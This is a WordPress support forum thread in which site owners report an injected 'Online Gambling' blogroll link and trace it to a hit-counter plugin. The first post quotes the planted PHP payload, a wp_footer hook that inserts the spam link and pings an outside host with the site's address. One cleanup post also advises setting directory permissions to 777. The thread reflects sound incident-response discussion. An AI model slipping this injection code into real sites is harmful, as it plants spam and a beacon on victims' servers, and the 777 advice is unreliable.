Forums

WordPress › Support » How-To and Troubleshooting

My site hacked? (14 posts)

  1. LFGabel
    Member
    Posted 1 year ago #

    Greetings,

    Not sure how or when this happened, but somehow someone was able to get into the site and add an "Online Gambling" link to the blogroll.

    I was running 2.9.2 at the time it happened and have since upgraded to 3.0.

    I only discovered the remnants of this hack when I was upgrading because I could not delete the files. Two files were placed into the wp-content directory:
    wp-content/cache/hookd/DOMAINNAME.com

    The two files were: 8b8203326e2a9c70947a and index.html, both of which had the owner permissions set so that I could not delete them.

    The index.html file was empty, but the "8b8203326e2a9c70947a" file contained the following code:

    c*entry:add_action:wp_footer:s:499:"global $wpdb;
if (!function_exists("wp_insert_link")) {
@include('wp-admin/includes/bookmark.php');
}
if(!get_option('_wp_version')) {
  if ($wpdb->get_var("SELECT COUNT(link_id) FROM $wpdb->links WHERE link_url='http://www.onlinegambling.eu'")==0) {
    @wp_insert_link(array("link_name" => "Online Gambling", "link_url" => "http://www.onlinegambling.eu"));
    @update_option('_wp_version', '1');
    $buffer = @file_get_contents('http://api.hookd.org/ping/' . get_option('home'));
  }
}";:c*end

    Did this happen because of a plugin I installed, or did someone get in some other way?

    Thanks.

  2. dd@sucuri.net
    Member
    Posted 1 year ago #

    Can you look at the dates of these files? This will help you see when it happened. Did you ever keep your WordPress not upgraded for a period of time?

  3. chrisaskew
    Member
    Posted 1 year ago #

    I have this problem also (v 2.9.2), and my website is not published. Any explanation/resolution?

  4. chrisaskew
    Member
    Posted 1 year ago #

    Further to above, my site had a bogus wp-content directory installed at the same level as the wordpress directory. When I try to reset permissions, it creates a duplicate directory the next level up, but doesn't change permissions on the original. I can rename the bogus directory, but that doesn't affect it.

    Also, I reiterate that my site is a sandbox; its URL has never been published and it has never been publicly accessed. is there some hook in the WordPress code that allows hacking?

    BTW - the bogus files are dated 6/22/10. The plug-in I installed closest to that date is the WordPress Hit Counter v. 2.3 by Gary-Adam Shannon.

  5. esmi
    Theme Diva & Forum Moderator
    Posted 1 year ago #

    my site is a sandbox; its URL has never been published and it has never been publicly accessed

    That doesn't rule out a back door somewhere else on the server. The most recent hack wave involved any .php files - irrespective of the application.

    is there some hook in the WordPress code that allows hacking?

    Was that a serious question?

  6. chrisaskew
    Member
    Posted 1 year ago #

    I assume this is WordPress related and not just a general PHP hack because it recreates a portion of the WP file structure and only appears in the WP-based website. It also coincides with the installation of the WordPress Hit Counter plug-in.

    Further to that, after uninstalling the WordPress Hit Counter plug-in, I was able to delete the bogus directories; however, the bogus Blogroll section still shows up on my site. I assumed from that that the original hack made some changes to the standard files. I looked through all the files, however, and found no modifications on or after that date except for two error logs. One of these indicated several database access errors on th 22nd, the date these problems appeared, which opens the possibility that the database was changed. I'm shooting in the dark here, though - this is not my area of expertise.

    Pardon me if I stepped on anyone's toes, but that is a serious question. I'm new to WP (which is a godsend on many ways) and I don't know if there is any way for a WP installation in normal operation to phone home (as other software packages do) or otherwise have a line of contact with the mother-ship that might be hijacked. After my further investigations, however, it seems more likely that the Hit Counter plug-in is responsible.

    I would still appreciate it if you or someone could address this hack directly and pass on any help or direction in cleaning it up.

  7. esmi
    Theme Diva & Forum Moderator
    Posted 1 year ago #

    Pardon me if I stepped on anyone's toes, but that is a serious question.

    Fair enough. If you think you've stumbled across a plugin with a bad security hole, try contacting the plugin's author first. If you think the plugin is deliberately opening up a back door and it's being hosted in the Plugin Respositary on wordpress.org, please let the folks at wordpress.org know about it. Use the form at http://wordpress.org/report-bugs/ if necessary.

  8. chrisaskew
    Member
    Posted 1 year ago #

    One other thing that appears to link the hack to the WordPress Hit Counter plug-in. The bogus directories initially couldn't have their permissions changed (it appeared to recreate them if changes were made). After I deleted the plug-in, I could change the permissions and delete the directories.

    Sadly, the code to insert the unwanted Blogroll entry was already hidden somewhere, so deleting the directories didn't fix the problem.

    Can someone who knows about these things tell me where and how what kind of code can be hidden to have this effect?

    Thanks.

  9. chrisaskew
    Member
    Posted 1 year ago #

    After much around-poking, I found a fix which clears up the immediate symptoms. I will have to leave to those who understand the code better to say whether it also removes any trace of the threat.

    1. As above, delete the WordPress Hit Counter Plug-in

    2. Find and change the permissions on the directories under wp-content/cache/hookd/DOMAINNAME.com from at least /hookd on down to 777.

    In my case the hack created a separate wp-content tree at the top (WP) level, so I just deleted the whole tree. If the bogus stuff got put under the real wp-content directory (as it seems for LFGabel above), you'll have to sort out what's real and not.

    3. Delete the bogus directories and their contents.

    4. In WP-Admin/Edit Links, remove the link "www.onlinegambling.eu". If it doesn't appear there, delete its record in the WP database table wp_links.

    5. In the WP database table wp_options delete the 4 records left by the Hit Counter (wp_version and three wphc records with consecutive option ids)

    I am hoping this gets rid of any traces of the exploit, and that the wp_footer action and $buffer line become moot once the evil code (as listed in LFGabel's initial post on this thread) is gone with the deleted directories/files.

    In any case, this relieves the immediate symptoms in my installation. If someone else can shed more light on the rest of this (I don't really understand the code or the execution model here) or let me know if I've done something really stupid and destructive, I'd greatly appreciate it.

  10. Allegro51
    Member
    Posted 1 year ago #

    I am in melt-down over this hack, and can barely understand the fix instructions. I was doing it late at night - installing WP Hit Counter - and I immediately noticed that there were like 1400 files, and I knew in my gut there was something very wrong! My client is going to have a stroke if they see that there!

    In chrisaskew's instructions I am stuck at step 2:
    2. Find and change the permissions on the directories under wp-content/cache/hookd/DOMAINNAME.com from at least /hookd on down to 777.

    In my case the hack created a separate wp-content tree at the top (WP) level, so I just deleted the whole tree. If the bogus stuff got put under the real wp-content directory (as it seems for LFGabel above), you'll have to sort out what's real and not.

    I have no clue what he is talking about with the permissions!

    Can someone tell me how just to get the Blogroll with the gambling link off the page, and then I can try to get to deeper fixing later?

    I am assuming that my regular WordPress data backup file is worthless for this purpose?

    Any help would be most appreciated - I must get that blogroll off there before ANYONE sees it or my life is toast!

  11. Allegro51
    Member
    Posted 1 year ago #

    Addendum: Has anyone filed a report on this horrific plug-in. It is the FIRST site counter that appears when you search for one. Why hasn't it been taken down yet? And here I thought if the plug-in was gotten through WP it would be safe; not to mention, the one that came up at the top of the list with good reviews.

  12. Allegro51
    Member
    Posted 1 year ago #

    I was able to get the Blogroll with the gamling link off my site just by going to Admin - Edit Links and deleting it. I did of course delete the plug-in. But other than that, I have no clue what else to do.

    Is the offending gambling link going to come back, if all I did was delete the plug-in and kill the gambling link in the Edit Links list?

    In these instructions from this thread - I don't even have a cache folder under wp-content
    2. Find and change the permissions on the directories under wp-content/cache/hookd/DOMAINNAME.com from at least /hookd on down to 777.

    Mainly I need to know if any ongoing damage will happen, I am already in a nightmare situation with this client. Thanks!

  13. gashannon
    Member
    Posted 1 year ago #

    Allegro,

    I'm updating the plugin now and have identified the source of problems... version 2.5 will be live shortly which removes an autoupdate script that was hijacked.

    If you update to 2.5 the plugin will be bulletproof and no problems at all

    Cheers

  14. gashannon
    Member
    Posted 1 year ago #

    The issue has been address - version 2.5 fixes this hack and is bulletproof now

  15. LuckyLester
    Member
    Posted 1 year ago #

    I have never installed this plugin on any of my WP blogs and yet several of them are getting blog roll links added to them as well.

    Also, I have checked several of them and and one of them contain the folders or files as described above.

    Personally I think that this exploit is getting in some other way. All of the blogs that are experiencing this problem are all runing on 2.9.2 and none of the blogs I have that are upgraded to 3.0 seem to be having this problem.

    I changed the passwords to a good many of them and since then they have not returned.

    Another thing I noticed is that some receive 1 link and others have had as many as 4 links added.

    Not sure if any of this has helped but just wanted to share some observations.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags